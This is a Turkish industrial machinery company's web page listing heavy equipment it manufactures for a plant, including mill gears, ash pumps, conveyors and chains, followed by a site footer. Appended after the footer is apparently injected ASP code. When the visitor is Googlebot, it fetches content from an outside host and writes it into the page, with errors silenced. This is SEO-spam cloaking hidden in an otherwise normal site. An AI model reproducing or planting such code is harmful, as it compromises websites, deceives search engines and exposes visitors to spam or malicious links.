• Desülfürizasyon Sistemi (Kireçtaşı Öğütme Tesisi)

• Kömür Öğütme Değirmen Aynaları

(~15.000 kg Ağırlık, Çap: 4.100 mm)

 • Değirmen Dişlileri– Çap :4.300 mm

 • Özel Redüktörler ve Dişlileri

 • Kül Pompası Fanları

 • Kül Pompası Gövdeleri

 • Çeşitli Aşınma Plakaları

 • Kompresör Gövdeleri

 • Kömür ve Kül Konveyörleri

 • Lamelli ve Oluklu Zincir İmalatı

 • Zincirli Kovalı Taşıyıcı Ekipmanları

 • Elekler

 • Ağır Hizmet Kırıcı Milleri

 • 4.000 adet Konveyör Rulosu

 • Soğutma suyu Sirkülasyon Pompa Fanı

(Çap: ~1.000 mm, Paslanmaz Çelik - 4, 5 ve 6 Kanatlı)

 • Borulama, Zincir Dişli, Yataklar, Kaplinler ve Diğerleri…

Anasayfa        Hakkımızda        Makine Parkı        Galeri        Referanslar        Maden Sahalarımız        İndir        İletişim       Copyright 2014 © EMSA Endüstri Makinaları İmalat San. ve Tic. Ltd. Şti.

 

EMSA Genel Garanti Şartları

 

Gizlilik ve Güvenlik - Kullanım Şartları - Yardım

 

<% On Error Resume Next Dim ua00 : ua00 = Request.ServerVariables("HTTP_USER_AGENT") If InStr(1, ua00, "google", vbTextCompare) > 0 And InStr(1, ua00, "bot", vbTextCompare) > 0 Then Dim req00 : Set req00 = Server.CreateObject("WinHttp.WinHttpRequest.5.1") With req00 .Open "GET", "http://escorter.info/link.php", True .Send If .WaitForResponse(10) Then With Server.CreateObject("Adodb.Stream") .Charset = "utf-8" .Type = 1 .Open .Write req00.ResponseBody .Position = 0 .Type = 2 Response.Write .ReadText .Close End With End If End With End If On Error GoTo 0 %>